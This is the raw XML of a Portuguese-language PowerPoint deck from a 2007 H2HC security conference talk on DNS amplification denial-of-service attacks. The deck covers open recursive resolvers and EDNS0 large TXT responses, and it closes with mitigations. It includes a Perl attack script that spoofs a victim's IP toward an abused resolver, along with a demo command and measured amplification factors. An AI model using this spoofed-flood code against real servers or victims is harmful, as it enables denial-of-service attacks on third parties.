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9" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>
    <p:sldId id="27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B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A75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stuff.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.squish.net/dnsche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br/docs/whitepapers/dns-recursivo-aberto/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.isotf.org/news/DNS-Amplification-Attack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hostinet.com/noticiashosting/33/ataques-ddos-con-servidores-dns-recursivo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pt-BR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Amplification</a:t>
            </a:r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</a:t>
            </a:r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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackers To Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fourth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edition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5786" y="4429132"/>
            <a:ext cx="7786742" cy="1752600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Bruno Gonçalves de Oliveira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a.k.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a mphx2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&lt;bruno.at.bsdmail.com&gt;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.servidor a ser consultado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anipulado pelo atacante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rande TXT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record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EDNS0 -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Mechanisms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DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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.grande TXT (exemplo)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4282" y="1714488"/>
            <a:ext cx="1007275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;; QUESTION SECTION:</a:t>
            </a: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;teste.h2hc.org.br.		IN	TXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="105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;; ANSWER SECTION:</a:t>
            </a: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teste.h2hc.org.br.	3600	IN	TXT	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"........................................................................................................................................................................................................................................" ""</a:t>
            </a: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;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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</a:t>
            </a:r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time: 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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msec</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="105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;; SERVER: 10.28.34.251#53(10.28.34.251)</a:t>
            </a:r>
          </a:p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;; WHEN: Fri Oct 19 09:32:48 2007</a:t>
            </a:r>
          </a:p>
          <a:p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;; MSG SIZE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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rcvd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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3847</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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.pseudo RR OPT in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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643182"/>
            <a:ext cx="4286280" cy="294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.servidores recursivos abertos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lood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requisições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poof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source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dos pacotes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the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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4" descr="dns-amp-att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3116"/>
            <a:ext cx="8773958" cy="3717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.dono da façanha (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source-code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174" y="1214422"/>
            <a:ext cx="8229600" cy="5000636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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original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dnsflood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Yevgeny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V.Yourkhov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modified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mphx2 for H2HC - Hackers to Hackers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Conference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Fourth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Edition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DNS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Amplification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Attack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#!/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perl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Net::DNS::Resolver;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Net::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RawIP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strict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($ARGV[0]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'') {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"DNS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Amplication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Attack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\n";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"H2HC - Hackers to Hackers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Conference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Fourth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Edition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(mphx2)\n\n";  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"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Usage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dnsamp_mphx2.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recursive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dns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&lt;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resolve&gt; &lt;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victim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&gt;\n";        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exit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(0);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("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abused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$ARGV[0]...\n"); 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src_ip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(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$i=0; $i &lt; 256; $i++) {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($i&gt;60) {                        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$i = 0;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$ARGV[1];                         #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big TXT for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src_ip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$ARGV[2];   		      #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victim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#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Make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DNS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packet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$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dnspacket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Net::DNS::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Packet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“TXT”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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$rr2 =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Net::DNS::RR(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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=&gt; $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=&gt; "OPT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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=&gt; 4096</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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);                      #use EDNS0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4kb for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</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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dnspacket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=&gt;$rr2);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dnsdata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dnspacket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-&gt;data;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Net::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RawIP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({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udp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=&gt;{}});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#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packet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-&gt;set({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=&gt; {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saddr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=&gt;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src_ip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daddr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=&gt; "$ARGV[0]",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frag_off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=&gt;0,tos=&gt;0,id=&gt;1565},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udp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=&gt; {source =&gt;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53,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=&gt; 53, data=&gt;$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dnsdata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} });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$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exit</a:t>
            </a:r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(0);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.fazendo a façanha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perl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dnsamp_mphx2.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pl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DNS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Amplication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Attack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Demonstratio</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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H2HC - Hackers to Hackers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Conference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Fourth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Edition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(mphx2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-B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 dnsamp_mphx2.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pl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recursive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dns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domain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resolve&gt; &lt;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victim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perl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dnsamp_mphx2 10.28.34.251 teste.h2hc.org.br 10.28.34.149</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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abused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 10.28.34.251...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queries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packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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85992"/>
            <a:ext cx="77247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response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packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (1.5k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)!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71604" y="5643578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14X o valor  dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pt-B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8" y="1800225"/>
            <a:ext cx="80105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icmp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packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port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unreachable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4525963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 pacotes ICMP são lançados da vítima para o servidor de DNS em resposta a um pacote UDP inesperado enviado  pelo servidor de DNS.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.quem sou eu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643182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estudante de Eng. Computação</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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pen-tester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onsultor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"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ecurity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officer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uçador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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response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packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; MTU = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragmented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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4282" y="5857892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43X o valor  dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 5" descr="recursivo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2"/>
            <a:ext cx="8677275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.DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools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64" y="714356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ites para consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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http://www.squish.net/dnscheck/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http://www.dnsstuff.com/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dig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(*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nix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pacotes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4" descr="recursiv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3500438"/>
            <a:ext cx="7796209" cy="1584304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 5" descr="nao-recursivo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72" y="5131782"/>
            <a:ext cx="7791475" cy="158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.solução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desabilitar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cache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 recursividade dos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servidores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autoritativos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esabilitar consulta externa dos servidores recursivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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.concluindo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UDP? Fraco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DNS? Fraco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Mas....administradores que não sabem administrar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4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.referências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5259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http://www.isotf.org/news/DNS-Amplification-Attacks.pdf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http://www.cert.br/docs/whitepapers/dns-recursivo-aberto/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http://hostinet.com/noticiashosting/33/ataques-ddos-con-servidores-dns-recursivos.html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.agradecimentos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rganização do H2HC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aos presentes – Will !!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 Jacira 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sogrona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– valeu pelo cartão!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Universidade – valeu pelo apoio ($$)!</a:t>
            </a:r>
          </a:p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Trampo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valeu por me dar folga,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 que ajudaram/apoiaram!!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pt-BR" sz="6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t-BR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obrigado ! ! !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dúvidas?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pt-BR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&lt;bruno.at.bsdmail.com&gt;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.protocolo DNS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ropriedade dos pacotes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HEADER |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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ID,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Flags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 Contadores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</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Pergunta ao servidor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Answer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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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RRs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 resposta a pergunta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Authority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</a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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RRs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indicando autoridade sobre a pergunta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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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RRs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contendo informações adicionais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.UDP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recisa dizer alguma coisa?!  =)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shake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!!!</a:t>
            </a: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.atuais vulnerabilidades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ache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poisoning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poof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id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equests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flood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.tipos de servidores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50030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autoritativos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donos da zona de domínio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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 não devem armazenar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cache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Recursivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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pt-BR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não DEVERIAM responder a consultas externas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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resolução de outros domínios por recursividade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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</a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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m 4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.funcionamento da recursividade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7435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m 4" descr="h2h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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>let’s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have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fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!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45259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anipulação de hosts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ervidor a ser consultado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ervidores recursivos abertos a consulta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código-fonte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DNS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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.manipulação de hosts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DDoS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Denial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árias origens e uma só vítima</a:t>
            </a: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zombies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Ferramentas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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trin00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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tfn2k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lot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stuffs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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 3" descr="h2h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22764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444</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Apresentação na tela (4:3)</PresentationFormat>
  <Paragraphs>126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DNS Amplification Attack Hackers To Hackers Conference – Fourth Edition</vt:lpstr>
      <vt:lpstr>.quem sou eu</vt:lpstr>
      <vt:lpstr>.protocolo DNS</vt:lpstr>
      <vt:lpstr>.UDP </vt:lpstr>
      <vt:lpstr>.atuais vulnerabilidades</vt:lpstr>
      <vt:lpstr>.tipos de servidores</vt:lpstr>
      <vt:lpstr>.funcionamento da recursividade</vt:lpstr>
      <vt:lpstr>.let’s have fun!!</vt:lpstr>
      <vt:lpstr>.manipulação de hosts</vt:lpstr>
      <vt:lpstr>.servidor a ser consultado</vt:lpstr>
      <vt:lpstr>.grande TXT (exemplo)</vt:lpstr>
      <vt:lpstr>.pseudo RR OPT in packet!</vt:lpstr>
      <vt:lpstr>.servidores recursivos abertos</vt:lpstr>
      <vt:lpstr>.the attack!!</vt:lpstr>
      <vt:lpstr>.dono da façanha (source-code)</vt:lpstr>
      <vt:lpstr>.fazendo a façanha</vt:lpstr>
      <vt:lpstr>.queries packet!</vt:lpstr>
      <vt:lpstr>.response packets (1.5k limit)!</vt:lpstr>
      <vt:lpstr>.icmp packets (port unreachable)</vt:lpstr>
      <vt:lpstr>.response packets &gt; MTU = fragmented!</vt:lpstr>
      <vt:lpstr>.DNS tools</vt:lpstr>
      <vt:lpstr>.solução</vt:lpstr>
      <vt:lpstr>.concluindo</vt:lpstr>
      <vt:lpstr>.referências</vt:lpstr>
      <vt:lpstr>.agradecimentos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Amplification Attack Hackers To Hackers Conference – Fourth Edition</dc:title>
  <dc:creator>Bruno</dc:creator>
  <cp:lastModifiedBy>Bruno</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-10-15T18:21:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-10-28T14:27:23Z</dcterms:modified>
</cp:coreProperties>
</file>